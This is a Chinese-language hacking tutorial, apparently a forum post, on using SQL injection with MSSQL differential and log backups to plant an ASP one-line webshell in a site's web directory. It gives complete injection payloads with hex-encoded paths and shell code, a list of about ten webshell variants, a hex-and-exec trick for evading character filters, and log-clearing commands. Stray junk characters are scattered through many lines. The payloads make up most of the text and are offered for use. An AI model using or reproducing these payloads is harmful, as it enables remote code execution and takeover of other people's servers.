MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

& t; M4 R* a7 ~2.创建表并插曲入数据
9 {% a8 k4 f1 U" \' Vcreate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
" X7 @6 e8 Z  L' }
上面
1 f& U5 P+ L) r9 Q0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
) ^$ K" ]9 E* [
  s! g/ D1 U1 j% k如下是网上常见的差异备份代码，思路一样！
===================================================
) W( \9 v0 s# n7 J; ~4 W- I% M利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
0 o$ ~* p. O( x0 h; j1 ]$ @# A8 a' r+ s
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

7 S$ r2 Z/ `5 X7 P+ Ccreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
" {5 z8 q0 a. [& C+ C. |
drop table [xiaolu]  -- 删除此表。

& F0 }+ k- X! }0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
' q# y$ P+ `  l' i& _+ C
3 i) u, G; I3 L0 ~3 k( m  X3 l' L- @% k声明：方法不是我想的，我只是写工具，默认得到shell是
4 Q! A4 K2 L: W4 O/ R( T) ~" r<%execute(request("a"))%>
" E" ~# o0 ?! g7 q- c===============================================================

/ I, M( ~. a/ E0 _& Q5 g0 h我发现上面代码，有时会无效，而直接用
& h; K* ]# c/ y' a0 R+ u5 I6 ?
( ?8 o, B' L) _6 B4 R- U7 h* V3 dbackup database 库名 to disk = 'c:\ddd.bak'

- F! h, P, `. {3 l; O3 m: ]0 q8 |, }create table [dbo].[dtest] ([cmd] [image]);
( S+ V- ~4 R  n6 e+ i6 P; O6 e
1 m+ g2 Z+ F# N+ L0 s/ g+ e# h  oinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

) w6 ~# X- r7 [% \! r" U7 e$ f却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
$ a; |  R; s, i7 D4 N3 l1 q" v( X
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
# K8 C+ k( A  W- E& }
. o. A) h" [0 }网上还有log增量备份的，我也把他记录一下
7 j4 J# J* |9 U4 N) i=====================================================
另一种log增量备份技术:

';alter database null set RECOVERY FULL--
9 Z. A9 ~' ^' s! w
% c' V: X% `7 {! H, l/ i';create table cmd (a image)--
+ W- f5 G, W# y/ U# a
# {" t, Z2 M" q* ]+ p  z3 w5 e';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--
) Y3 `, S0 c$ d6 k2 _! q8 d( E- c: C
  y- \/ z( D6 ~6 f7 Z';drop table cmd--

  D2 `% M( G: j% g';alter database XXX set RECOVERY SIMPLE--
6 R( a5 l( c& j/ e7 V  t+ S& G
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：

1 m% H$ d7 A% b6 {a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
/ T/ H6 J3 b+ [2 S6 }# ld)<script language=VBScript runat=server>execute request("a")</script>
5 e9 a" |: h2 Y5 S8 Y" Ze)<%25Execute(request("a"))%25>
8 \1 M9 i5 w0 b9 Xf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
8 R# m, s1 I0 M4 S( Z2 gh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
& }& D/ s+ y9 r# mI)<%eval request(0)%>
% \" H( J* a  x) e% X5 w- ?J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
6 c7 x6 U+ \2 B' z6 O/ I! K
=============================================
% ~% r, s2 I8 u, A8 o3 [
0 |5 x8 j0 e, s当遇到差备过滤了/时用这个语句代替
5 n- r6 \8 U4 j: G4 \9 s
. L1 p" q, M3 _" `declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

8 W  \7 O$ I# i. f5 \8 U把要执行的语句转16进制然后用exec执行

- ^, C. j: v/ j9 \; m" u6 `
5 g& g) J0 }8 c4 C  S9 A6 p减少备份文件大小方法如下:
8 r5 @- S1 r) q3 L- J( y7 L
5 d6 h% t5 ]- k! X6 r. P) C总的来说就是那么简单几句,下面以备份数据库model为例子
7 f0 @! w% I' W. F; X1
, V. z3 h1 Z* p9 xid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--



SQL语句清理日志
注：test为数据库名
8 n9 c5 g8 z2 q8 z
* |# w; A* L$ h; M' N- z/ x3 E* _--清空日志
5 D, Y( I* g: m# ]8 C" h2 NDUMP TRANSACTION test WITH NO_LOG
! G9 |' M- ^" A! v' Y
--截断事务日志
# B1 ]0 w- X) m/ f- H# HBACKUP LOG test WITH NO_LOG
* s& W- @* {/ a( _* q% t$ {
--收缩数据库
. d, E4 B2 B# \DBCC SHRINKDATABASE(test)

2 l, ^5 R2 n9 O, J# G6 [--收缩指定数据文件,1是文件号,可以通过这个语句查询到
# K* L* ]1 C2 ^/ K2 }( LSelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
% r( K* Z- a$ y$ Q  `' oEXEC sp_dboption 'test', 'autoshrink', 'TRUE'